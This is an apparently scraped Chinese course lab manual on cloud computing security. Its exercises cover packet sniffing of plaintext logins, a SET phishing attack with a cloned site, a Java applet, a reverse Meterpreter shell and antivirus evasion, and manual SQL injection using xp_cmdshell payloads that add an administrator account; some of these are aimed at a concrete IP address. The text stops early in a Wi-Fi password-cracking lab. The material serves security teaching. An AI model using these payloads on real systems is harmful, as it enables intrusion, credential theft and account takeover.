《云计算安全》实验指导书docx

  • 格式:pdf
  • 大小:2.12 MB
  • 文档页数:32

实验一:使用sniffer捕获加密包和非加密包

一、实验目的

 使用Sniffer抓包工具进行网络抓包的练习

 抓取加密与不加密两种数据包

 分析并理解采用加密和不加密技术数据的传输状态。

二、实验设备

安装了sniffer的客户机;

可提供网络链接功能的服务器;

实验拓扑结构定义如下: Sniffer工作站(物理机)Web服务器(虚拟机)

三、实验内容

熟悉Sniffer网络抓包工具的使用。

使用Sniffer网络抓包工具抓取客户端与服务器端之间的通信包。访问服务器存放好的

两个版本的网页,分别为登录加密与登录不加密。

分析加密与不加密数据包之间的差异。

四、实验步骤

1、启动程序,在Setting对话框中,选择自己的NIC,单击OK

2、打开Capture选单,选择Define Filter,然后选择Address页

3、单击Profiles 按钮,创建新配置文件

4、在Capture Profiles对话框中,单击New

5、输入stXXXX(XXXX为学号)作为新配置文件名,单击

OK

6、选择stXXXX文件,然后单击Done按钮

7、单击Station 1 字段,输入本机的IP地址,单击Station 2字段,输入合作伙伴的IP地址

(或缺省为any)

8、将Address Type字段的值由硬件Hardware改为IP,然后,单击OK按钮返回主屏幕

9、单击start按钮,开始捕捉数据包

10、访问bbs,mail等(smail.tongji.edu.cn)

11、捕获到数据包之后,单击工具栏上的end and view按钮

12、仔细察看数据包,应该可以看到用户名和密码

13、访问加密过的mail(mail.yahoo.com.cn)等,重复以上步骤。

14、仔细察看数据包,由于数据包被加密,应该可以看不到用户名和密码。

实验二:社会工程学攻击

一、实验目的

 掌握Java Applet Attack Method和Credential Harvester Attack Method社会工程学工

具的原理及使用

 掌握社会工程学攻击的原理、攻击方法和攻击步骤

 提高钓鱼网站识别能力,提高网络安全防范意识

二、实验设备

客户端主机:装有BackTrack5的PC;

目标主机:运行windows操作系统的PC

注:实验的两台主机需在同一网段下

三、实验内容

通过邮件,使用户点击访问BT5伪造的网站,诱骗用户在网页端执行java程序,使得

BT5能够得到该用户的信息和控制权。

四、实验步骤

1. 打开set的配置文件set_config进行配置

root@bt:/pentest/exploits/set/config#vi set_config)

1.1 配置METASPLOIT_PATH

1.2 配置EMAIL_PROVIDER

1.3 配置SELF_SIGNED_APPLET和JAVA_ID_PARAM

2. 打开set程序

(root@bt:/pentest/exploits/set # ./set)

2.1选择1 Socail-Engineering Attacks进行社会工程学攻击

2.2 选择2 Website Attach Vector

2.3 选择1 Java Applet Attack Method,进行java攻击

2.4选择2 Site Cloner,进行克隆网站

2.5输入签名所需的基本信息

2.6 输入网址:http://www.baidu.com对该网站进行克隆

2.7选2 Windows Reverse TCP Meterpreter

2.8选择16,在攻击程序外套个壳,用于穿越杀毒软件和防火墙。

2.9设置本地监听端口号,443的端口号穿越性好。

2.10 选1E-mail Attack Single Email Address

2.11填写邮件的收件地址,标题和内容

2.12 执行程序发送邮件

3. 用户收到邮件后,点击链接访问

3.1 打开邮箱查收邮件

3.2 访问邮件中的地址

3.3选择运行java程序

3.4 BT5服务器端连接用户,并在用户端创建notepad.exe进程

3.5 打开用户端任务管理器,发现notepad.exe

3.6 BT5中输入sessions –i1成功连接目标机器

实验三:SQL注入

一、实验目的

 熟悉SQL注入攻击的一些基本步骤。

 加深对SQL注入攻击各个阶段的理解。

 提高读者对具体威胁的分析和防护能力。

二、实验设备

作为Web服务器的主机,提供登录页面,其后台数据库满足如下条件:

(1)数据库为Access

(2)程序没有对于id进行过滤

(3)数据库表中有个字段名为id

三、实验内容

 通过手工注入获得后台管理权限

 手动注入的各种常用SQL语句

 手动注入探测出管理员账号和密码

四、实验步骤

1、判断能否进行SQL注入

 http://210.34.17.178/displaynews.asp?id=772 and 1=1

 http://210.34.17.178/displaynews.asp?id=772 and 1=2

如果1显示正常,2显示错误,或者没有页面, 则表明可以进行SQL注入。

2、判断数据库类型

 http://210.34.17.178/displaynews.asp?id=772 and user>0

user是SQL Server的内置变量

1.and (select count(*) from sysobjects)>0

2.and (select count(*) from msysobjects)>0

如果1正常,则表示SQL server.

3、选择注入方法

(A) ID=49 这类注入的参数是数字型,SQL语句如下:  Select * from 表名 where 字段=49

注入的参数为ID=49 And [查询条件],即是生成语句:

 Select * from 表名 where 字段=49 And [查询条件]

(B) Class=连续剧这类注入的参数是字符型,SQL语句如下:

 Select * from 表名 where 字段=’连续剧’

注入的参数为Class=连续剧’ and [查询条件] and ‘’=’,即是生成语句:

 Select * from 表名 where 字段=’连续剧’ and [查询条件] and ‘’=’’

(C) 搜索时没过滤参数的,如keyword=关键字,SQL语句原貌大致如下:

 Select * from 表名 where 字段like ’%关键字%’

注入的参数为keyword=’ and [查询条件] and ‘%25’=’,即是生成语句:

 Select * from 表名 where字段like ’%’ and [查询条件] and ‘%’=’%’

4、猜表名

 ID=49 And (Select Count(*) from Admin)>=0

表名猜出来后,将Count(*)替换成Count(字段名),

 and (select top 1 len(username) from Admin)>0

猜用户名长度

 and (select top 1 asc(mid(username,1,1)) from Admin)>0

猜用户名

5、利用系统表注入SQLServer数据库

 id=1;exec master..xp_cmdshell “net user name password /add”

创建系统用户

 Id=1;exec master..xp_cmdshell “net localgroup name administrators /add”

把该用户加入administrators组

 id=1;backup database 数据库名 to disk=’c:\inetpub\wwwroot\1.db’

备份数据库

实验四:无线密码破解

一、实验目的

 使用BT5的破解指定路由器密码的具体流程

 了解破解无线网络Aircrack-NG网络套件的使用

 使用Aircrack-NG破解加密的无线网络密码

二、实验设备

 装有BT5的主机

 无线网卡:TP-LINK TL-WN821N

 无线网卡驱动:Rtl8192

 无线AccessPoint:NETGEAR 无线路由器

三、实验内容

 通过无线网卡进行抓包,锁定需要破解的路由器

 进行deauth攻击与指定路由器建立握手

 通过暴力文件破解路由器密码

四、 实验步骤

1. 安装无线网卡驱动

(下载地址:http://www.aircrack-ng.org/doku.php?id=compat-wireless)

1.1 解压安装文件

(root@bt:~# tar xvjf compat-wireless-3.6.8-1.tar.bz2)